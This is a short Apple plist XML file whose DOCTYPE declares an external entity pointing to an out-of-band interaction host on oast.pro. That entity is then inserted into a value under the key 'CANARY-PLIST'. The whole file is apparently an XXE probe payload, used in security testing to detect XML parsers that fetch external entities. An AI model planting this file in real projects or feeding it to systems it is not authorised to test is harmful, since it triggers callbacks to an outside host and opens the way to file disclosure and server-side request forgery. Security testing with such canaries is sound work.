<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd" [
<!ENTITY oob SYSTEM "http://plist.d9j7ocsgtqkls609354g7qfi57qo6s8j6.oast.pro/x">]>
<plist version="1.0"><dict><key>CANARY-PLIST</key><string>&oob;</string></dict></plist>